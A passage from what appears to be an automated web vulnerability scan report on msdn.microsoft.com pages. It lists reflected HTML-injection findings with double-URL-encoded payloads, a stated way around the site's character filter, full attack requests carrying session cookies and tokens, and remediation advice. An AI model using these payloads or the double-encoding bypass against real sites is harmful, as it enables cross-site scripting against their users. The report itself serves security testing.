User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:24 GMT
Content-Length: 9198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v14105"><a>4aaafa655d=office.11)" />
...[SNIP]...

2.69. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edda6%2522%253e%253ca%253e6e9b407ad3c was submitted in the REST URL parameter 1. This input was echoed as edda6"><a>6e9b407ad3c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usedda6%2522%253e%253ca%253e6e9b407ad3c/library/dd582939(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usedda6"><a>6e9b407ad3c/library/dd582939(office.11" />
...[SNIP]...

2.70. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0c3e%2522%253e%253ca%253e86fe33f7661 was submitted in the REST URL parameter 2. This input was echoed as a0c3e"><a>86fe33f7661 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya0c3e%2522%253e%253ca%253e86fe33f7661/dd582939(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya0c3e"><a>86fe33f7661/dd582939(office.11" />
...[SNIP]...

2.71. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1089%2522%253e%253ca%253e1aa87e60d4f was submitted in the REST URL parameter 3. This input was echoed as e1089"><a>1aa87e60d4f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582939(office.11e1089%2522%253e%253ca%253e1aa87e60d4f HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582939(office.11e1089"><a>1aa87e60d4f" />
...[SNIP]...

2.72. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80778%2522%253e%253ca%253e591d660c3c3 was submitted in the REST URL parameter 1. This input was echoed as 80778"><a>591d660c3c3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us80778%2522%253e%253ca%253e591d660c3c3/library/dd582939(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us80778"><a>591d660c3c3/library/dd582939(office.11)" />
...[SNIP]...

2.73. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582939(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a19f7%2522%253e%253ca%253e3cb7c16355f was submitted in the REST URL parameter 2. This input was echoed as a19f7"><a>3cb7c16355f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya19f7%2522%253e%253ca%253e3cb7c16355f/dd582939(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9221
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
